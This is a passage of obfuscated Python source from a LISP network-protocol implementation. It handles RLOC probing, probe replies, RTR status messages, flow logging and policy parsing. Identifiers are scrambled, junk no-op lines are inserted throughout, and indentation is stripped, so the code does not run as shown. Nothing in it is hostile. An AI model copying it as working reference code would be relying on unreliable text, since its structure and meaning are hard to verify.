if 29 - 29: i11iIiiIii
if 34 - 34: OoOoOO00
if 17 - 17: oO0o * OoOoOO00 % OoO0O00 % I1IiiI * I11i
if ( I111Ii1I1I1iI and I111Ii1I1I1iI . recently_echoed ( ) ) :
lprint ( ( "Suppress RLOC-probe to {}, nonce-echo " + "received" ) . format ( red ( O0O0 , False ) ) )
if 78 - 78: OoooooooOO . I1Ii111 + Ii1I - II111iiii - IiII / iIii1I11I1II1
continue
if 92 - 92: Ii1I
if 34 - 34: OOooOOo * OoooooooOO / I1ii11iIi11i
if 41 - 41: i1IIi
if 75 - 75: o0oOOo0O0Ooo . I1Ii111 - I1Ii111 % Ii1I * OoooooooOO
if 99 - 99: OOooOOo + o0oOOo0O0Ooo - OOooOOo . i1IIi
if 86 - 86: Ii1I % oO0o - i11iIiiIii - O0 + IiII + iII111i
if ( iIIiI11 . last_rloc_probe != None ) :
i11iII11I1III = iIIiI11 . last_rloc_probe_reply
if ( i11iII11I1III == None ) : i11iII11I1III = 0
I1i1IIIi1iii = time . time ( ) - i11iII11I1III
if ( iIIiI11 . up_state ( ) and I1i1IIIi1iii >= LISP_RLOC_PROBE_REPLY_WAIT ) :
if 100 - 100: OoO0O00 . Oo0Ooo
iIIiI11 . state = LISP_RLOC_UNREACH_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( iIIiI11 . rloc , False )
O00OOO0 = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, probe it" . format ( red ( O0O0 , False ) , O00OOO0 ) )
if 29 - 29: OoO0O00
if 34 - 34: O0 - o0oOOo0O0Ooo % OOooOOo . OoO0O00 % IiII
lisp_mark_rlocs_for_other_eids ( Iii1iIi1i )
if 63 - 63: O0 % iIii1I11I1II1 . o0oOOo0O0Ooo . I1IiiI * Ii1I % i1IIi
if 47 - 47: II111iiii * I1ii11iIi11i
if 70 - 70: I1ii11iIi11i - o0oOOo0O0Ooo
iIIiI11 . last_rloc_probe = lisp_get_timestamp ( )
if 71 - 71: I1ii11iIi11i * i1IIi
OOoOo0o0oO = "" if iIIiI11 . unreach_state ( ) == False else " unreachable"
if 57 - 57: O0 * Ii1I / I1IiiI
if 54 - 54: iIii1I11I1II1 + iII111i % OoOoOO00 % OOooOOo
if 67 - 67: iII111i . II111iiii - I1IiiI / iII111i . Ii1I
if 42 - 42: I1IiiI % I1Ii111 % iII111i + iII111i
if 71 - 71: Oo0Ooo / OoOoOO00 - I1ii11iIi11i
if 32 - 32: iII111i
if 99 - 99: o0oOOo0O0Ooo . oO0o
iIiI1iIiII1 = ""
iii1111ii = None
if ( iIIiI11 . rloc_next_hop != None ) :
IiI11I111 , iii1111ii = iIIiI11 . rloc_next_hop
lisp_install_host_route ( O0O0 , iii1111ii , True )
iIiI1iIiII1 = ", send on nh {}({})" . format ( iii1111ii , IiI11I111 )
if 56 - 56: I11i % OoOoOO00 - OoO0O00
if 31 - 31: iII111i % i11iIiiIii - Ii1I / OOooOOo - I1Ii111
if 60 - 60: o0oOOo0O0Ooo + Oo0Ooo . O0
if 51 - 51: i11iIiiIii / iIii1I11I1II1 . I1IiiI - Ii1I * I1Ii111 . iII111i
if 72 - 72: Ii1I . I11i / i1IIi % i1IIi + I1ii11iIi11i
OOOooOOoOO0o = iIIiI11 . print_rloc_probe_rtt ( )
OOOO0oO00 = O0O0
if ( iIIiI11 . translated_port != 0 ) :
OOOO0oO00 += ":{}" . format ( iIIiI11 . translated_port )
if 91 - 91: OoooooooOO % O0 * OoooooooOO . OOooOOo * I1Ii111 + OoO0O00
OOOO0oO00 = red ( OOOO0oO00 , False )
if ( iIIiI11 . rloc_name != None ) :
OOOO0oO00 += " (" + blue ( iIIiI11 . rloc_name , False ) + ")"
if 6 - 6: IiII + I11i / Ii1I / Oo0Ooo - oO0o
lprint ( "Send {}{} {}, last rtt: {}{}" . format ( Oooooo0OOO , OOoOo0o0oO ,
OOOO0oO00 , OOOooOOoOO0o , iIiI1iIiII1 ) )
if 31 - 31: i11iIiiIii % oO0o + ooOoO0o - i1IIi
if 87 - 87: IiII + oO0o
if 87 - 87: ooOoO0o
if 47 - 47: i11iIiiIii
if 84 - 84: Ii1I + ooOoO0o
if 81 - 81: I1ii11iIi11i - iIii1I11I1II1
if 31 - 31: I11i * oO0o % I1ii11iIi11i * I1Ii111 % OoOoOO00 + oO0o
if 33 - 33: I1Ii111
if ( iIIiI11 . rloc_next_hop != None ) :
OoII1 = lisp_get_host_route_next_hop ( O0O0 )
if ( OoII1 ) : lisp_install_host_route ( O0O0 , OoII1 , False )
if 96 - 96: i1IIi
if 52 - 52: OoO0O00 * Ii1I + OOooOOo + ooOoO0o * OoooooooOO
if 34 - 34: I1Ii111 . I1Ii111 * ooOoO0o % OoOoOO00
if 71 - 71: I1Ii111 - I1Ii111
if 13 - 13: iII111i + I1ii11iIi11i - oO0o / IiII * i1IIi * Oo0Ooo
if 65 - 65: Ii1I - OOooOOo % O0 * I1ii11iIi11i . II111iiii
if ( iIIiI11 . rloc . is_null ( ) ) :
iIIiI11 . rloc . copy_address ( oO00O . rloc )
if 59 - 59: O0 . O0 / i11iIiiIii * Oo0Ooo . I11i . Ii1I
if 89 - 89: O0 + OoO0O00
if 3 - 3: Oo0Ooo * OoooooooOO * oO0o % OoOoOO00 * OoOoOO00 . ooOoO0o
if 16 - 16: ooOoO0o / o0oOOo0O0Ooo - O0 * I1IiiI
if 13 - 13: iII111i . iII111i % O0 % o0oOOo0O0Ooo
OoiIii11i11i = None if ( oo0oOooo0O . is_null ( ) ) else o0Ooo0Oooo0o
oOOOOOo0o = o0Ooo0Oooo0o if ( oo0oOooo0O . is_null ( ) ) else oo0oOooo0O
lisp_send_map_request ( lisp_sockets , 0 , OoiIii11i11i , oOOOOOo0o , iIIiI11 )
ii11ii1 = oO00O
if 89 - 89: I11i + IiII + Oo0Ooo . ooOoO0o / I1IiiI * Ii1I
if 14 - 14: Ii1I * I1Ii111 + I1ii11iIi11i % OoO0O00 * Ii1I + iII111i
if 6 - 6: iII111i / iII111i . i11iIiiIii
if 12 - 12: I11i - OoO0O00
if ( iii1111ii ) : lisp_install_host_route ( O0O0 , iii1111ii , False )
if 68 - 68: IiII - OoOoOO00
if 22 - 22: i1IIi . IiII
if 8 - 8: IiII % o0oOOo0O0Ooo . i11iIiiIii
if 69 - 69: I1Ii111 / Ii1I - ooOoO0o
if 38 - 38: II111iiii % OoooooooOO / OoooooooOO . Ii1I . Ii1I
if ( OoII1 ) : lisp_install_host_route ( O0O0 , OoII1 , True )
if 13 - 13: oO0o - i1IIi / i1IIi + OoooooooOO
if 57 - 57: OoooooooOO / O0 + I1ii11iIi11i % I11i * oO0o / Ii1I
if 49 - 49: I1IiiI * ooOoO0o * OOooOOo + OoO0O00 + ooOoO0o
if 42 - 42: i1IIi . OoO0O00 % iII111i
O0oo0oOo += 1
if ( ( O0oo0oOo % 10 ) == 0 ) : time . sleep ( 0.020 )
if 57 - 57: I1ii11iIi11i / I1IiiI
if 69 - 69: iII111i - iII111i . OoO0O00 / oO0o - OoO0O00 + I1Ii111
if 98 - 98: iII111i . oO0o - O0 % I1IiiI . I1ii11iIi11i / i1IIi
lprint ( "---------- End RLOC Probing ----------" )
return
if 72 - 72: I1IiiI / Oo0Ooo % IiII - O0 / O0 * O0
if 83 - 83: O0 / I1Ii111 - OoooooooOO
if 42 - 42: Ii1I / i1IIi - IiII / I1Ii111
if 39 - 39: OoooooooOO
if 4 - 4: iIii1I11I1II1 - Oo0Ooo / OOooOOo % OoooooooOO . Oo0Ooo - Oo0Ooo
if 41 - 41: II111iiii . o0oOOo0O0Ooo
if 92 - 92: Ii1I - O0 - i11iIiiIii + IiII % I1Ii111 + II111iiii
if 71 - 71: ooOoO0o * I1Ii111 + i11iIiiIii + i1IIi . I1IiiI
def lisp_update_rtr_updown ( rtr , updown ) :
global lisp_ipc_socket
if 15 - 15: OoO0O00
if 37 - 37: OoO0O00 . OoooooooOO - OOooOOo
if 34 - 34: o0oOOo0O0Ooo + iIii1I11I1II1 / o0oOOo0O0Ooo / ooOoO0o
if 53 - 53: II111iiii / iIii1I11I1II1
if ( lisp_i_am_itr == False ) : return
if 25 - 25: I1Ii111
if 58 - 58: OoOoOO00 * i1IIi
if 20 - 20: IiII
if 81 - 81: I1Ii111 . i1IIi / o0oOOo0O0Ooo
if 30 - 30: i11iIiiIii . I1IiiI
if ( lisp_register_all_rtrs ) : return
if 5 - 5: Ii1I / O0 + iIii1I11I1II1
I1O0OOOoOOOO0 = rtr . print_address_no_iid ( )
if 9 - 9: o0oOOo0O0Ooo % i1IIi / OoO0O00 / OOooOOo + I1Ii111
if 80 - 80: Oo0Ooo . iIii1I11I1II1 . OoooooooOO % iII111i . oO0o
if 10 - 10: i11iIiiIii * OoooooooOO . i11iIiiIii
if 35 - 35: OOooOOo * OOooOOo + o0oOOo0O0Ooo / i1IIi - I11i
if 12 - 12: I1ii11iIi11i - i11iIiiIii + I1IiiI . Oo0Ooo
if ( I1O0OOOoOOOO0 not in lisp_rtr_list ) : return
if 26 - 26: oO0o + I1Ii111 + IiII * o0oOOo0O0Ooo . oO0o
updown = "up" if updown else "down"
lprint ( "Send ETR IPC message, RTR {} has done {}" . format (
red ( I1O0OOOoOOOO0 , False ) , bold ( updown , False ) ) )
if 95 - 95: OoOoOO00 . I1Ii111 / Ii1I . I1Ii111 % OoO0O00
if 16 - 16: Ii1I / I1IiiI / I1IiiI - OoooooooOO
if 13 - 13: OOooOOo / OoooooooOO
if 7 - 7: II111iiii - ooOoO0o
OO = "rtr%{}%{}" . format ( I1O0OOOoOOOO0 , updown )
OO = lisp_command_ipc ( OO , "lisp-itr" )
lisp_ipc ( OO , lisp_ipc_socket , "lisp-etr" )
return
if 72 - 72: Ii1I
if 27 - 27: ooOoO0o / IiII + OoO0O00 + Ii1I % I1Ii111
if 86 - 86: O0 % i11iIiiIii - Ii1I * oO0o % OOooOOo * i1IIi
if 87 - 87: II111iiii
if 53 - 53: OoOoOO00 * i11iIiiIii / I1Ii111
if 100 - 100: ooOoO0o + I1IiiI * oO0o + ooOoO0o
if 24 - 24: i11iIiiIii + ooOoO0o
def lisp_process_rloc_probe_reply ( rloc_entry , source , port , map_reply , ttl ,
mrloc ) :
iIIiI11 = rloc_entry . rloc
o0Oo0o = map_reply . nonce
o000O000oo = map_reply . hop_count
Oooooo0OOO = bold ( "RLOC-probe reply" , False )
I1I11iii1I1 = iIIiI11 . print_address_no_iid ( )
o0oo0OoO0O = source . print_address_no_iid ( )
oo00O0000o00 = lisp_rloc_probe_list
OoO00 = rloc_entry . json . json_string if rloc_entry . json else None
i1 = lisp_get_timestamp ( )
if 56 - 56: O0 / OoooooooOO / OoOoOO00
if 19 - 19: o0oOOo0O0Ooo / i11iIiiIii . i1IIi / Oo0Ooo / I1Ii111
if 83 - 83: iII111i % o0oOOo0O0Ooo * OoOoOO00
if 49 - 49: II111iiii / OoO0O00
if 69 - 69: Ii1I * II111iiii
if 24 - 24: I1Ii111 * I1ii11iIi11i . OOooOOo . I1IiiI - I1ii11iIi11i
if ( mrloc != None ) :
OOOOOO0O00O00 = mrloc . rloc . print_address_no_iid ( )
if ( I1I11iii1I1 not in mrloc . multicast_rloc_probe_list ) :
o00oOo0OOoo = lisp_rloc ( )
o00oOo0OOoo = copy . deepcopy ( mrloc )
o00oOo0OOoo . rloc . copy_address ( iIIiI11 )
o00oOo0OOoo . multicast_rloc_probe_list = { }
mrloc . multicast_rloc_probe_list [ I1I11iii1I1 ] = o00oOo0OOoo
if 19 - 19: iII111i % Ii1I / II111iiii + IiII / Oo0Ooo * OOooOOo
o00oOo0OOoo = mrloc . multicast_rloc_probe_list [ I1I11iii1I1 ]
o00oOo0OOoo . last_rloc_probe_nonce = mrloc . last_rloc_probe_nonce
o00oOo0OOoo . last_rloc_probe = mrloc . last_rloc_probe
iiiI1I , o0Ooo0Oooo0o , oo0oOooo0O = lisp_rloc_probe_list [ OOOOOO0O00O00 ] [ 0 ]
o00oOo0OOoo . process_rloc_probe_reply ( i1 , o0Oo0o , o0Ooo0Oooo0o , oo0oOooo0O , o000O000oo , ttl , OoO00 )
mrloc . process_rloc_probe_reply ( i1 , o0Oo0o , o0Ooo0Oooo0o , oo0oOooo0O , o000O000oo , ttl , OoO00 )
return
if 34 - 34: OOooOOo . oO0o + I11i / I1Ii111 . I11i
if 59 - 59: Ii1I
if 47 - 47: iII111i % iII111i
if 81 - 81: oO0o / I1ii11iIi11i . OoooooooOO % II111iiii / oO0o
if 23 - 23: IiII + oO0o + o0oOOo0O0Ooo . I1ii11iIi11i / i11iIiiIii + iIii1I11I1II1
if 74 - 74: I11i % OOooOOo
if 57 - 57: O0 + I1IiiI + i11iIiiIii
IiI = I1I11iii1I1
if ( IiI not in oo00O0000o00 ) :
IiI += ":" + str ( port )
if ( IiI not in oo00O0000o00 ) :
IiI = o0oo0OoO0O
if ( IiI not in oo00O0000o00 ) :
IiI += ":" + str ( port )
lprint ( " Received unsolicited {} from {}/{}, port {}" . format ( Oooooo0OOO , red ( I1I11iii1I1 , False ) , red ( o0oo0OoO0O ,
# iIii1I11I1II1 - iII111i - oO0o + Oo0Ooo . Ii1I / i11iIiiIii
False ) , port ) )
return
if 31 - 31: I1Ii111 * i11iIiiIii * IiII - OoooooooOO
if 82 - 82: II111iiii . Ii1I . i1IIi % iII111i . II111iiii
if 61 - 61: I1IiiI / Ii1I . O0 + iII111i + oO0o / I11i
if 14 - 14: I11i % iII111i * i11iIiiIii % i1IIi
if 10 - 10: iIii1I11I1II1
if 42 - 42: Oo0Ooo * I1ii11iIi11i
if 77 - 77: ooOoO0o % I1IiiI * oO0o
if 91 - 91: OoOoOO00 * Oo0Ooo * IiII - I1IiiI
for iIIiI11 , o0Ooo0Oooo0o , oo0oOooo0O in lisp_rloc_probe_list [ IiI ] :
if ( lisp_i_am_rtr ) :
if ( iIIiI11 . translated_port != 0 and iIIiI11 . translated_port != port ) :
continue
if 37 - 37: Oo0Ooo - oO0o / I1ii11iIi11i . o0oOOo0O0Ooo * Ii1I
if 95 - 95: i11iIiiIii - ooOoO0o / I11i / I1Ii111
iIIiI11 . process_rloc_probe_reply ( i1 , o0Oo0o , o0Ooo0Oooo0o , oo0oOooo0O , o000O000oo , ttl , OoO00 )
if 59 - 59: iII111i
return
if 59 - 59: Oo0Ooo - IiII
if 6 - 6: OOooOOo - I1IiiI . IiII
if 40 - 40: II111iiii
if 13 - 13: OoOoOO00
if 23 - 23: Oo0Ooo / II111iiii % OOooOOo % iII111i - Oo0Ooo / OoO0O00
if 7 - 7: Ii1I / I11i / II111iiii % I11i * I11i + iIii1I11I1II1
if 6 - 6: iIii1I11I1II1 * oO0o - iIii1I11I1II1 . O0 . O0
if 96 - 96: I1Ii111 * II111iiii % i11iIiiIii - oO0o
def lisp_db_list_length ( ) :
O0oo0oOo = 0
for OoO0oO in lisp_db_list :
O0oo0oOo += len ( OoO0oO . dynamic_eids ) if OoO0oO . dynamic_eid_configured ( ) else 1
O0oo0oOo += len ( OoO0oO . eid . iid_list )
if 32 - 32: i11iIiiIii * o0oOOo0O0Ooo . OoooooooOO / O0
return ( O0oo0oOo )
if 14 - 14: i11iIiiIii . I1Ii111 % I1ii11iIi11i . I1ii11iIi11i % IiII
if 93 - 93: iIii1I11I1II1 / IiII
if 91 - 91: i11iIiiIii % ooOoO0o - iII111i * I1Ii111 . i11iIiiIii
if 1 - 1: IiII + iIii1I11I1II1 * I1ii11iIi11i - IiII - i1IIi
if 75 - 75: II111iiii * o0oOOo0O0Ooo / I1ii11iIi11i
if 46 - 46: OOooOOo
if 67 - 67: OoO0O00 . I11i % OOooOOo + Oo0Ooo
if 40 - 40: OoO0O00 / I11i % iIii1I11I1II1 - ooOoO0o
def lisp_is_myeid ( eid ) :
for OoO0oO in lisp_db_list :
if ( eid . is_more_specific ( OoO0oO . eid ) ) : return ( True )
if 51 - 51: Oo0Ooo % iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo
return ( False )
if 32 - 32: I1Ii111 * I1IiiI + Ii1I
if 30 - 30: OoooooooOO / I1IiiI . iIii1I11I1II1 / ooOoO0o
if 20 - 20: OoooooooOO * OOooOOo
if 77 - 77: Ii1I - OoooooooOO . OoOoOO00
if 93 - 93: OoooooooOO / I1Ii111
if 91 - 91: I1Ii111
if 18 - 18: ooOoO0o * I11i
if 53 - 53: I11i . i11iIiiIii - iIii1I11I1II1 / I1Ii111
if 86 - 86: i1IIi % OoO0O00 - OoooooooOO
def lisp_format_macs ( sa , da ) :
sa = sa [ 0 : 4 ] + "-" + sa [ 4 : 8 ] + "-" + sa [ 8 : 12 ]
da = da [ 0 : 4 ] + "-" + da [ 4 : 8 ] + "-" + da [ 8 : 12 ]
return ( "{} -> {}" . format ( sa , da ) )
if 63 - 63: o0oOOo0O0Ooo . iIii1I11I1II1 % IiII * i11iIiiIii
if 70 - 70: iIii1I11I1II1
if 12 - 12: OoOoOO00 / o0oOOo0O0Ooo - I1ii11iIi11i + oO0o + O0
if 9 - 9: I1ii11iIi11i * OoooooooOO . O0 . ooOoO0o * i11iIiiIii / i1IIi
if 38 - 38: OoOoOO00 . OoooooooOO % I1ii11iIi11i . oO0o % oO0o
if 80 - 80: i11iIiiIii / OoOoOO00 . OOooOOo . iIii1I11I1II1
if 81 - 81: I1ii11iIi11i * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO
def lisp_get_echo_nonce ( rloc , rloc_str ) :
if ( lisp_nonce_echoing == False ) : return ( None )
if 64 - 64: Oo0Ooo . I1ii11iIi11i / ooOoO0o % oO0o . iIii1I11I1II1
if ( rloc ) : rloc_str = rloc . print_address_no_iid ( )
I111Ii1I1I1iI = None
if ( rloc_str in lisp_nonce_echo_list ) :
I111Ii1I1I1iI = lisp_nonce_echo_list [ rloc_str ]
if 84 - 84: II111iiii . oO0o * O0 / iII111i + OoooooooOO
return ( I111Ii1I1I1iI )
if 99 - 99: I1ii11iIi11i . oO0o + Oo0Ooo + I1ii11iIi11i / I1Ii111 . I1ii11iIi11i
if 95 - 95: OoOoOO00 * iIii1I11I1II1 / OoooooooOO % i1IIi
if 91 - 91: OOooOOo - OoOoOO00
if 58 - 58: II111iiii . OOooOOo % II111iiii * oO0o % OoO0O00 % I11i
if 71 - 71: Ii1I * II111iiii * I1IiiI
if 22 - 22: oO0o
if 96 - 96: ooOoO0o * iII111i . IiII
if 77 - 77: OOooOOo - I11i % o0oOOo0O0Ooo
def lisp_decode_dist_name ( packet ) :
O0oo0oOo = 0
IIiIiii1I1i = b""
if 43 - 43: OoOoOO00 - o0oOOo0O0Ooo
while ( packet [ 0 : 1 ] != b"\x00" ) :
if ( O0oo0oOo == 255 ) : return ( [ None , None ] )
IIiIiii1I1i += packet [ 0 : 1 ]
packet = packet [ 1 : : ]
O0oo0oOo += 1
if 22 - 22: i1IIi
if 33 - 33: O0
packet = packet [ 1 : : ]
return ( packet , IIiIiii1I1i . decode ( ) )
if 34 - 34: I1Ii111 . IiII % iII111i
if 94 - 94: OOooOOo % i11iIiiIii . OOooOOo
if 55 - 55: OoOoOO00 . OoOoOO00 % o0oOOo0O0Ooo . I11i . I1ii11iIi11i - o0oOOo0O0Ooo
if 1 - 1: i11iIiiIii - i1IIi * oO0o - iIii1I11I1II1
if 75 - 75: i1IIi * i11iIiiIii
if 40 - 40: I1ii11iIi11i + OoO0O00
if 8 - 8: i11iIiiIii - iIii1I11I1II1
if 73 - 73: OoOoOO00
def lisp_write_flow_log ( flow_log ) :
o0OoO0 = open ( "./logs/lisp-flow.log" , "a" )
if 25 - 25: iII111i / oO0o
O0oo0oOo = 0
for oo000o in flow_log :
Oo00oo = oo000o [ 3 ]
OoooO0O0o0oOO = Oo00oo . print_flow ( oo000o [ 0 ] , oo000o [ 1 ] , oo000o [ 2 ] )
o0OoO0 . write ( OoooO0O0o0oOO )
O0oo0oOo += 1
if 9 - 9: OoooooooOO / OOooOOo / O0 - OoOoOO00
o0OoO0 . close ( )
del ( flow_log )
if 22 - 22: Ii1I * I1ii11iIi11i * o0oOOo0O0Ooo - I1IiiI . i11iIiiIii
O0oo0oOo = bold ( str ( O0oo0oOo ) , False )
lprint ( "Wrote {} flow entries to ./logs/lisp-flow.log" . format ( O0oo0oOo ) )
return
if 30 - 30: O0 / oO0o * i11iIiiIii + iIii1I11I1II1 + O0 % I1IiiI
if 95 - 95: ooOoO0o % OOooOOo
if 17 - 17: i1IIi + Ii1I
if 35 - 35: iIii1I11I1II1 - Oo0Ooo - OoooooooOO % I1ii11iIi11i
if 27 - 27: Oo0Ooo * II111iiii - OOooOOo + o0oOOo0O0Ooo
if 26 - 26: oO0o / I1ii11iIi11i - oO0o
if 9 - 9: ooOoO0o * iIii1I11I1II1 * OoooooooOO
def lisp_policy_command ( kv_pair ) :
iIIiiIi = lisp_policy ( "" )
I1oO0 = None
if 96 - 96: Ii1I
o00ooOO = [ ]
for iIi1iIIIiIiI in range ( len ( kv_pair [ "datetime-range" ] ) ) :
o00ooOO . append ( lisp_policy_match ( ) )
if 74 - 74: iII111i / iIii1I11I1II1 * I11i + oO0o + iIii1I11I1II1 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o . o0oOOo0O0Ooo . OoooooooOO . oO0o . i11iIiiIii / o0oOOo0O0Ooo
for oO0OoO000oO0o in list ( kv_pair . keys ( ) ) :
oOO0 = kv_pair [ oO0OoO000oO0o ]
if 18 - 18: IiII . i11iIiiIii % I1IiiI
if 11 - 11: I11i % I1Ii111 + O0 . Ii1I . I1ii11iIi11i % I1Ii111
if 28 - 28: IiII . o0oOOo0O0Ooo + iII111i - OoOoOO00 / OOooOOo
if 86 - 86: ooOoO0o * OoOoOO00 + oO0o / II111iiii % OOooOOo
if ( oO0OoO000oO0o == "instance-id" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
if ( i1i . source_eid == None ) :
i1i . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 74 - 74: I1ii11iIi11i . OoO0O00
if ( i1i . dest_eid == None ) :
i1i . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 23 - 23: IiII + oO0o
i1i . source_eid . instance_id = int ( Ooo0oO0O00o0 )
i1i . dest_eid . instance_id = int ( Ooo0oO0O00o0 )
if 48 - 48: iII111i * OoO0O00 * OoOoOO00 * I11i
if 74 - 74: ooOoO0o
if ( oO0OoO000oO0o == "source-eid" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
if ( i1i . source_eid == None ) :
i1i . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 93 - 93: Oo0Ooo % ooOoO0o
oooo = i1i . source_eid . instance_id
i1i . source_eid . store_prefix ( Ooo0oO0O00o0 )
i1i . source_eid . instance_id = oooo
if 38 - 38: II111iiii . I1Ii111 . iIii1I11I1II1 / o0oOOo0O0Ooo
if 6 - 6: ooOoO0o - i1IIi * I1IiiI
if ( oO0OoO000oO0o == "destination-eid" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
if ( i1i . dest_eid == None ) :
i1i . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 24 - 24: iIii1I11I1II1 / I1Ii111
oooo = i1i . dest_eid . instance_id
i1i . dest_eid . store_prefix ( Ooo0oO0O00o0 )
i1i . dest_eid . instance_id = oooo
if 16 - 16: OoOoOO00 * I1Ii111 - I1IiiI / I1Ii111
if 64 - 64: I1ii11iIi11i . i1IIi % II111iiii % Oo0Ooo + oO0o - I1IiiI
if ( oO0OoO000oO0o == "source-rloc" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . source_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
i1i . source_rloc . store_prefix ( Ooo0oO0O00o0 )
if 24 - 24: IiII . II111iiii . II111iiii . OoOoOO00 . i11iIiiIii
if 11 - 11: Ii1I
if ( oO0OoO000oO0o == "destination-rloc" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . dest_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
i1i . dest_rloc . store_prefix ( Ooo0oO0O00o0 )
if 82 - 82: I11i - i1IIi . Oo0Ooo * I1Ii111
if 44 - 44: iII111i
if ( oO0OoO000oO0o == "rloc-record-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . rloc_record_name = Ooo0oO0O00o0
if 56 - 56: II111iiii / Oo0Ooo % IiII * II111iiii - iIii1I11I1II1 + ooOoO0o
if 33 - 33: o0oOOo0O0Ooo . I11i / I1IiiI
if ( oO0OoO000oO0o == "geo-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . geo_name = Ooo0oO0O00o0
if 29 - 29: o0oOOo0O0Ooo - ooOoO0o
if 59 - 59: I11i / IiII * OoO0O00 / IiII . I1Ii111
if ( oO0OoO000oO0o == "elp-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . elp_name = Ooo0oO0O00o0
if 82 - 82: OOooOOo . iIii1I11I1II1 + I1Ii111
if 14 - 14: IiII . i11iIiiIii
if ( oO0OoO000oO0o == "rle-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . rle_name = Ooo0oO0O00o0
if 17 - 17: ooOoO0o % ooOoO0o * oO0o
if 8 - 8: ooOoO0o + OoO0O00 . II111iiii / iIii1I11I1II1 - OOooOOo
if ( oO0OoO000oO0o == "json-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . json_name = Ooo0oO0O00o0
if 87 - 87: iIii1I11I1II1 . IiII % I1IiiI . OoO0O00 - I1Ii111
if 53 - 53: I1Ii111 % i11iIiiIii
if ( oO0OoO000oO0o == "datetime-range" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
i1i = o00ooOO [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
oOO0O00o0O0 = lisp_datetime ( Ooo0oO0O00o0 [ 0 : 19 ] )
ii11IIiI1iIi = lisp_datetime ( Ooo0oO0O00o0 [ 19 : : ] )
if ( oOO0O00o0O0 . valid_datetime ( ) and ii11IIiI1iIi . valid_datetime ( ) ) :
i1i . datetime_lower = oOO0O00o0O0
i1i . datetime_upper = ii11IIiI1iIi
if 99 - 99: I1IiiI - i1IIi * i11iIiiIii + OoO0O00
if 80 - 80: o0oOOo0O0Ooo . I11i % iIii1I11I1II1 + OoOoOO00
if 87 - 87: I1Ii111 + II111iiii / I1ii11iIi11i + OoOoOO00
if 71 - 71: I1IiiI + iIii1I11I1II1 + O0 * iII111i % IiII
if 42 - 42: OOooOOo - I1ii11iIi11i
if 93 - 93: I1Ii111 + OOooOOo % ooOoO0o / I1Ii111 % OOooOOo . IiII
if 37 - 37: iII111i * oO0o / oO0o / Ii1I % I11i
if ( oO0OoO000oO0o == "set-action" ) :
iIIiiIi . set_action = oOO0
if 12 - 12: i11iIiiIii
if ( oO0OoO000oO0o == "set-record-ttl" ) :
iIIiiIi . set_record_ttl = int ( oOO0 )
if 62 - 62: oO0o + OOooOOo + oO0o + I1IiiI
if ( oO0OoO000oO0o == "set-instance-id" ) :
if ( iIIiiIi . set_source_eid == None ) :
iIIiiIi . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 10 - 10: IiII - Oo0Ooo % ooOoO0o
if ( iIIiiIi . set_dest_eid == None ) :
iIIiiIi . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 38 - 38: oO0o * o0oOOo0O0Ooo . I11i % II111iiii / I11i % Ii1I
I1oO0 = int ( oOO0 )
iIIiiIi . set_source_eid . instance_id = I1oO0
iIIiiIi . set_dest_eid . instance_id = I1oO0
